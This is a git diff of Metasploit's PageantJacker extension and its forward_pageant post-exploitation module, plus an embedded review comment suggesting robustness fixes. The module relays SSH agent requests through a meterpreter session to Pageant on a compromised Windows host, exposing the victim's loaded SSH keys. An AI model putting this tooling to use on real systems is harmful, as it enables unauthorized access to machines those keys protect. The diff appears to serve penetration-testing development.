diff --git a/lib/rex/post/meterpreter/extensions/pageantjacker/pageantjacker.rb b/lib/rex/post/meterpreter/extensions/pageantjacker/pageantjacker.rb
index 48cd6f5d48..d98abc8fd8 100644
--- a/lib/rex/post/meterpreter/extensions/pageantjacker/pageantjacker.rb
+++ b/lib/rex/post/meterpreter/extensions/pageantjacker/pageantjacker.rb
@@ -33,15 +33,12 @@ class Pageantjacker < Extension
 def forward_to_pageant(blob,size)
 return unless size > 0
 return unless blob.size > 0
- #puts "Request indicated size: #{size}"
- #parse_blob(blob)
-
 # Create the packet
 packet_request = Packet.create_request('pageant_send_query')
 packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANTJACKER_SIZE_IN, size)
 packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANTJACKER_BLOB_IN, blob)
-
- response = client.send_request(packet_request)
+
+ response = client.send_request(packet_request)
 return nil if !response
 pageant_plugin_response = {
@@ -53,18 +50,6 @@ class Pageantjacker < Extension
 return pageant_plugin_response
 end
-# def parse_blob(blob)
-# b = blob.unpack('NCH*')
-# puts " blob size #{blob.size}"
-# puts " blob data (20 chars: #{blob.unpack('H20').first}"
-# puts " ssh packet size: #{b[0]}"
-# puts " ssh type: #{b[1]}"
-# puts " ssh data: #{b[2]}"
-# end
-
-# def stop_listening
-# end
-
 end
 end; end; end; end; end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/pageantjacker.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/pageantjacker.rb
index 4a0c7d57c1..598fea8154 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/pageantjacker.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/pageantjacker.rb
@@ -6,11 +6,9 @@ module Post
 module Meterpreter
 module Ui
-require 'tmpdir'
-
 ###
 #
-# PageantJacker extension
+# PageantJacker extension
 #
 ###
 class Console::CommandDispatcher::PageantJacker
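Review bot: The re-indented `response = client.send_request(packet_request)` line still feeds `return nil if !response`, and the two `return unless … > 0` guards at the top of forward_to_pageant also return nil, yet the method's only visible caller in modules/post/windows/manage/forward_pageant.rb (the `@@ -79,14 +79,14 @@` hunk) does `if response[:success]` with no nil check, so an empty read from the local socket (presumably a client closing it) or a session that returns no reply raises NoMethodError inside the accept loop instead of producing the logged error the `else` branch was written for. Returning one hash shape on every path keeps the caller simple, e.g. `return { success: false, blob: '', error: 'no response from Pageant' } unless response`, using the same keys the caller already reads, with an equivalent early return for the empty-input guards. The `size` argument is also sent as `TLV_TYPE_EXTENSION_PAGEANTJACKER_SIZE_IN` without being compared to `blob.size`; since the visible caller passes `blob.size`, a `return … unless size == blob.size` guard would keep the two from drifting apart. forward_to_pageant's body continues past this hunk into the next one.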
@@ -23,17 +21,18 @@ class Console::CommandDispatcher::PageantJacker
 super
 print_line
 print_line
- print_line(" .mMMMMMm. mMMm M WWW W W RRRRR")
- print_line(" mMMMMMMMMMMM. MM MM W W W R R")
- print_line(" /MMMM- -MM. MM MM W W W R R")
- print_line(" /MMM. _ \/ ^ M M M M W W W W RRRR")
- print_line(" |M. aRRr /W| M M M M W W W W R R")
- print_line(" \/ .. ^^^ wWWW| M M M W W R R")
- print_line(" /WW\. .wWWWW/ M M M W W R R")
- print_line(" |WWWWWWWWWWW/")
- print_line(" .WWWWWW. PageantJacker Extension")
+ print_line(" .mMMMMMm. mMMm M WWW W W RRRRR")
+ print_line(" mMMMMMMMMMMM. MM MM W W W R R")
+ print_line(" /MMMM- -MM. MM MM W W W R R")
+ print_line(" /MMM. _ \/ ^ M M M M W W W W RRRR")
+ print_line(" |M. aRRr /W| M M M M W W W W R R")
+ print_line(" \/ .. ^^^ wWWW| M M M W W R R")
+ print_line(" /WW\. .wWWWW/ M M M W W R R")
+ print_line(" |WWWWWWWWWWW/")
+ print_line(" .WWWWWW. PageantJacker Extension")
+ print_line(" stuart.morgan@mwrinfosecurity.com")
 print_line
- print_line(" Use post/windows/manage/forward_pageant to proxy agent requests through Pageant")
+ print_line(" Use post/windows/manage/forward_pageant to proxy through Pageant")
 print_line
 end
diff --git a/modules/post/windows/manage/forward_pageant.rb b/modules/post/windows/manage/forward_pageant.rb
index 7084731525..5474fa112f 100644
--- a/modules/post/windows/manage/forward_pageant.rb
+++ b/modules/post/windows/manage/forward_pageant.rb
@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Post
 def initialize(info={})
 super( update_info( info,
- 'Name' => 'Forward SSH agent requests to Pageant',
+ 'Name' => 'Forward SSH Agent Requests To Remote Pageant',
 'Description' => %q{
 This module forwards SSH agent requests from a local socket to a remote Pageant instance. If a target Windows machine is compromised and is running Pageant, this will allow the
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Post
 loaded into the remote meterpreter session by this module if it is not already loaded.
 },
 'License' => MSF_LICENSE,
- 'Author' => [
+ 'Author' => [
 'Stuart Morgan ',
 ],
 'Platform' => [ 'win' ],
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Post
 if ::File.exists?(@sockpath)
 print_error("Your requested socket (#{@sockpath}) already exists. Remove it or choose another path and try again.")
 return false
- end
+ end
 # Open the socket and start listening on it. Essentially now forward traffic between us and the remote Pageant instance.
 ::UNIXServer.open(@sockpath) {|serv|
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Post
 print_status("Set SSH_AUTH_SOCK variable to #{@sockpath} (e.g. export SSH_AUTH_SOCK=\"#{@sockpath}\")")
 print_status("Now use any tool normally (e.g. ssh-add)")
- loop {
+ loop {
 s = serv.accept
 loop {
 socket_request_data = s.recvfrom(8192)
@@ -79,14 +79,14 @@ class Metasploit3 < Msf::Post
 vprint_status("PageantJacker: Received data from socket (size: #{socket_request_data.first.size})")
 response = client.pageantjacker.forward_to_pageant(socket_request_data.first, socket_request_data.first.size)
 if response[:success]
- s.send response[:blob],0
+ s.send response[:blob],0
 vprint_status("PageantJacker: Response received (Success='#{response[:success]}' Size='#{response[:blob].size}' Error='#{response[:error]}')")
 else
 print_error("PageantJacker: Unsuccessful response received (#{response[:error]})")
 end
- }
- }
- }
+ }
+ }
+ }
 end